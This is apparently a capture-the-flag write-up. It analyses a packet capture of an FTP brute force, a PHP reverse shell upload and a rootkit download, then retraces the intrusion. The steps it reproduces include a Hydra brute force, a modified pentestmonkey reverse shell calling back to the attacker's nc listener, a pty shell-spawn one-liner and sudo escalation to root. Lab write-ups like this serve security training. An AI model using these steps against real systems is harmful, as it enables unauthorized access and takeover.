H4CKED

H4CKED

Part 1 - Oh no! We've been hacked!


1. The attacker is trying to log into a specific service. What service is this?

FTP

So as soon as I start scrolling through the provided pcap file it's fairly obvious that something or someone is messing with FTP

Ah ha then we can see they are trying to brute force ftp creds. Cool let's take a look at this a little more.

2. There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool? 

Hydra

3. The attacker is trying to log on with a specific username. What is the username?

jenny

We can see from the file it's pretty obvious they are trying to log on with the username jenny.

If we want to dive a little deeper or double check we can right click one of those lines > click Follow > and then > TCP Stream

This will bring up the communication up until this point. We can be sure now that jenny is the username they are trying to brute force.

4. What is the user's password?

password123

After seeing that they were trying to brute force FTP I decided to filter to just FTP, I then scrolled down to the last entry and followed the process above. Right click the last entry > Follow > TCP Stream.

Now we can see below a clear text username and password being used to gain access to the FTP server.

5. What is the current FTP working directory after the attacker logged in?

/var/www/html

We can see there is still some more info in that last follow output that we can use. If you  notice below the file path we are looking for is in there as well.

6. The attacker uploaded a backdoor. What is the backdoor's filename?

shell.php

And if we look down the same output a little more we can see the "shell.php" file that they uploaded.

7. The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

http://pentestmonkey.net/tools/php-reverse-shell

While we are looking through the main pcap file we see a lot of ftp packets, however there are a couple that stand out that have ftp-data. If we look at the one on line 431 we can see there are a decent amount of bytes.

We can also notice these bytes are in plain text.

Let's grab this and open it up in something that's a little easier to read. If we right click and 'Copy ...as Printable Text' then paste into a text editor we can see the actual file they uploaded with the source code.

We can now see where they got the back door/reverse shell from.

8. Which command did the attacker manually execute after getting a reverse shell?

whoami

If we clear our filters and scroll all the way to the last entry, right click and follow TCP stream again we can grab a clear text transcription of everything the attacker typed.

We can use this info to answer the rest of the questions on this section. We can also use it to hack back into the system and get root.

9. What is the computer's hostname?

wir3

10. Which command did the attacker execute to spawn a new TTY shell?

python3 -c 'import pty; pty.spawn("/bin/bash")'

11. Which command was executed to gain a root shell?

sudo su

12. The attacker downloaded something from GitHub. What is the name of the GitHub project?

reptile

13. The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

rootkit


Part 2 - Hack your way back into the machine

The first part we need to get back into the FTP server and witch the information on the shell.php so we can retrace their steps and gain access to the server. First we try SSH but it is refused. So, let's try the clear text creds we have to get in. We find that the password doesn't work anymore for jenny.

So, let's try and use Hydra to brute force the password.

Cool, looks like that worked! Now let's get into the FTP server.

It worked and we can see the shell.php. We notice that we have full access to the file so we really just need to download it, modify it with our info and then re-upload it, then access it to get the shell. Let's go.

Now let's open it in an editor and modify it.

If you're not familiar with this rev shell, it's okay. It's really easy to modify. Both things we need to modify are at the top of the code:  " // CHANGE THIS ". This is to set your local ip and port that you want the rev shell to send back to.

Once we have those changes made and save we can go ahead and re-upload it to the ftp server.

Okay, if all went well we should be able to start a nc listener and then visit http://IP/shell.php and get a shell!

And we are in!

We should be able to switch out of www-data and become user jenny with the creds we have. But first we need to stabilize the shell.

Cool, now we are jenny. Let's follow the attackers steps to be root. First we are going to run sudo -l to see what privileges jenny has.

WE ARE ROOT!

After a little navigation grabbing the root flag is a piece of cake.

Hope this helped! Happy Hacking.